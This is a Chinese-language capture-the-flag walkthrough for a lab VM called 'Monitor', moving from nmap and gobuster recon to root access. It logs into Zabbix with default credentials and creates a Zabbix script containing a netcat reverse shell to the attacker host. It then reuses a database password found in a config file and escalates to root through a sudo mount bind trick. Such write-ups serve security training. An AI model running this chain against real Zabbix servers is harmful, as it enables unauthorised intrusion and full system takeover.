信息收集

┌──(root㉿kali)-[~]
└─# arp-scan -l | grep PCS
192.168.31.92   08:00:27:1d:29:60       PCS Systemtechnik GmbH
                                                                                                                                                            
┌──(root㉿kali)-[~]
└─# IP=192.168.31.92

┌──(root㉿kali)-[~]
└─# nmap -sV -sC -A $IP -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-10 08:34 EDT
Nmap scan report for Monitor (192.168.31.92)
Host is up (0.00059s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: \xE7\x9B\x91\xE6\x8E\xA7\xE7\xB3\xBB\xE7\xBB\x9F\xE7\x99\xBB\xE5\xBD\x95
|_http-server-header: Apache/2.4.62 (Debian)
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      36034/udp6  mountd
|   100005  1,2,3      38236/udp   mountd
|   100005  1,2,3      38947/tcp6  mountd
|   100005  1,2,3      41683/tcp   mountd
|   100021  1,3,4      32829/tcp6  nlockmgr
|   100021  1,3,4      33419/tcp   nlockmgr
|   100021  1,3,4      41563/udp   nlockmgr
|   100021  1,3,4      60724/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp open  nfs     3-4 (RPC #100003)
MAC Address: 08:00:27:1D:29:60 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.59 ms Monitor (192.168.31.92)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.21 seconds

目录扫描

┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.92
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,bk,bak,tar,php3,zip,gz,shtml,php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/index.php            (Status: 200) [Size: 1841]
/upload               (Status: 301) [Size: 315] [--> http://192.168.31.92/upload/]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/dashboard.php        (Status: 302) [Size: 0] [--> index.php]
/zabbix               (Status: 301) [Size: 315] [--> http://192.168.31.92/zabbix/]
/.html                (Status: 403) [Size: 278]
/.php                 (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
Progress: 2426160 / 2426171 (100.00%)
===============================================================
Finished
===============================================================

直接打开尝试登录，随便试了下弱密码 admin/admin 就进去了，不过没啥用

扫出来/zabbix ，搜了下默认账密是Admin/zabbix

在 Administration - Scripts 创建脚本

1	nc 192.168.31.58 23333 -e /bin/sh

kali 监听

1	nc -lvp 23333

在 Monitoring - Hosts 运行脚本反弹shell

在 /home/hyh/user.txt 中取得 flag

1	flag{user-ab0e0561b1a833a6141ad2273744543c}

提权

现在用的 netcat shell 是一个非交互式 Shell，用起来很不方便，所以要先稳定 shell

按顺序执行：

script /dev/null -c bash
Ctrl + Z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash

查看 zabbix 的 web 配置文件

zabbix@Monitor:/$ find / -name 'zabbix.conf.php' 2>/dev/null
/usr/share/zabbix/conf/zabbix.conf.php
/etc/zabbix/web/zabbix.conf.php
zabbix@Monitor:/$ cat /usr/share/zabbix/conf/zabbix.conf.php
<?php
// Zabbix GUI configuration file.

$DB['TYPE']                             = 'MYSQL';
$DB['SERVER']                   = 'localhost';
$DB['PORT']                             = '0';
$DB['DATABASE']                 = 'zabbix';
$DB['USER']                             = 'zabbix';
$DB['PASSWORD']                 = 'root123';

// Schema name. Used for PostgreSQL.
$DB['SCHEMA']                   = '';

// Used for TLS connection.
$DB['ENCRYPTION']               = false;
$DB['KEY_FILE']                 = '';
$DB['CERT_FILE']                = '';
$DB['CA_FILE']                  = '';
$DB['VERIFY_HOST']              = false;
$DB['CIPHER_LIST']              = '';

// Vault configuration. Used if database credentials are stored in Vault secrets manager.
$DB['VAULT_URL']                = '';
$DB['VAULT_DB_PATH']    = '';
$DB['VAULT_TOKEN']              = '';

// Use IEEE754 compatible value range for 64-bit Numeric (float) history values.
// This option is enabled by default for new Zabbix installations.
// For upgraded installations, please read database upgrade notes before enabling this option.
$DB['DOUBLE_IEEE754']   = true;

// Uncomment and set to desired values to override Zabbix hostname/IP and port.
// $ZBX_SERVER                  = '';
// $ZBX_SERVER_PORT             = '';

$ZBX_SERVER_NAME                = 'Zabbix';

$IMAGE_FORMAT_DEFAULT   = IMAGE_FORMAT_PNG;

// Uncomment this block only if you are using Elasticsearch.
// Elasticsearch url (can be string if same url is used for all types).
//$HISTORY['url'] = [
//      'uint' => 'http://localhost:9200',
//      'text' => 'http://localhost:9200'
//];
// Value types stored in Elasticsearch.
//$HISTORY['types'] = ['uint', 'text'];

// Used for SAML authentication.
// Uncomment to override the default paths to SP private key, SP and IdP X.509 certificates, and to set extra settings.
//$SSO['SP_KEY']                        = 'conf/certs/sp.key';
//$SSO['SP_CERT']                       = 'conf/certs/sp.crt';
//$SSO['IDP_CERT']              = 'conf/certs/idp.crt';
//$SSO['SETTINGS']              = [];

发现数据库密码是 root123，在 /home 下发现目录 hyh，尝试使用此密码登录用户 hyh

zabbix@Monitor:/$ ls /home
hyh
zabbix@Monitor:/$ su hyh
Password: 
hyh@Monitor:/$ id
uid=1000(hyh) gid=1000(hyh) groups=1000(hyh)

查看 sudo 权限

hyh@Monitor:/$ sudo -l
Matching Defaults entries for hyh on Monitor:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User hyh may run the following commands on Monitor:
    (ALL) NOPASSWD: /usr/bin/mount

利用 mount 提权

hyh@Monitor:/$ sudo mount -o bind /bin/sh /bin/mount
hyh@Monitor:/$ sudo mount
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
flag{root-deb15d884e04de6f6972b3c25e3cc11b}

1	flag{root-deb15d884e04de6f6972b3c25e3cc11b}

Monitor[群友靶机][复现]

信息收集

目录扫描

提权